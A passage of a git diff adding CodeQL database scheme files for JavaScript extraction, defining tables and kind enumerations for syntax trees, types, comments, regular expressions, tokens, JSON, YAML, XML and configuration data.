= @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape +| 28 = @regexp_quoted_string +| 29 = @regexp_intersection +| 30 = @regexp_subtraction; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_identifier_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +| 15 = @jsdoc_qualified_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/semmlecode.javascript.dbscheme b/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/semmlecode.javascript.dbscheme new file mode 100644 index 000000000000..5b5db607d20c --- /dev/null +++ b/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/semmlecode.javascript.dbscheme @@ -0,0 +1,1193 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; 